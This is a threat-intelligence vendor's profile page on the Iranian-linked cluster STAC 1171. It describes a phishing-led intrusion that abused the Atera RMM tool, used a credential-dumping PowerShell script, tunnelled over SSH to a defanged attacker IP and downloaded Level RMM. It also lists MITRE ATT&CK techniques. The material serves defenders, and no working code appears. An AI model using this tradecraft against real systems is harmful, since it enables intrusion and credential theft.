Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to threat actors
🇮🇷 IR1 malware family

STAC 1171

Also known asstac_1171

STAC 1171 is a Sophos-tracked activity cluster that Sophos assesses with moderate confidence is related to the Iranian threat actor MuddyWater, also known as TA450, based on indicator and TTP overlap with Proofpoint reporting. Sophos observed the cluster in a phishing-led intrusion campaign in which victims were directed via a Onehub-hosted shared document to download a ZIP archive containing a compressed installer for the legitimate remote monitoring and management tool Atera. After Atera Agent was installed, the operators used Atera remote run commands to execute a PowerShell script named a.ps1 intended to dump credentials and create a backup of the SYSTEM registry hive. Observed post-compromise activity included domain enumeration, creation of an SSH tunnel to 51.16.209[.]105, and an obfuscated PowerShell command to download the Level RMM tool from downloads.level.io. The first tracked incident occurred in November against an organization in Israel, and Sophos also observed similar telemetry affecting a non-MDR customer in the United States. Known aliases directly mentioned in the content are MuddyWater and TA450.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Where they target

Geographies tied to known operations.

  • 🇮🇱 Israel
  • 🇺🇸 United States

Where they're from

Attributed origin per open-source reporting.

  • IR
MITRE ATT&CK

Tradecraft

10 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

7 of 15 tactics12 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0042
Resource Development
1 technique
T1583
Acquire Infrastructure
T1583.006
Web Services
TA0001
Initial Access
1 technique
T1566
Phishing
T1566.001
Spearphishing Attachment
TA0002
Execution
1 technique
T1204
User Execution
T1204.002
Malicious File
TA0005
Stealth
1 technique
T1036
Masquerading
TA0006
Credential Access
2 techniques
T1003
OS Credential Dumping
T1555
Credentials from Password Stores
TA0008
Lateral Movement
1 technique
T1021
Remote Services
TA0011
Command and Control
2 techniques
T1071
Application Layer Protocol
T1090
Proxy
ARSENAL

Associated malware families

1 malware family attributed to this actor across reporting.

FamilyContextEvidenceLast seen
ForeLord"In late 2019/early 2020, CTU researchers observed COBALT ULSTER targeting non-governmental organizations (NGOs) and Middle Eastern governments using malware CTU researchers named FORELORD based on behavioral aspects of the malware's C2 communications."1Mar 18, 2026
IOCS

Observables

3 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

3 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app
sophos threat researchNews
Jan 1, 2026
Sophos MDR blocks and tracks activity from probable Iranian state actor “MuddyWater” | SOPHOS

Conducting targeted phishing campaigns to trick victims into installing legitimate RMM tools such as Atera, then using remote commands and PowerShell to dump credentials, save the SYSTEM registry hive, enumerate domains, establish an SSH tunnel, and download Level RMM.

Read more
sophos threat researchNews
Jan 1, 2026
Sophos MDR blocks and tracks activity from probable Iranian state actor “MuddyWater” | SOPHOS

Conducting targeted phishing campaigns to trick victims into downloading legitimate RMM tools such as Atera, then using remote execution and PowerShell to dump credentials, save the SYSTEM registry hive, enumerate domains, establish an SSH tunnel, and download Level RMM.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping10

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal1

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables3

Domains, IPs, and hashes tied to this actor, refreshed continuously.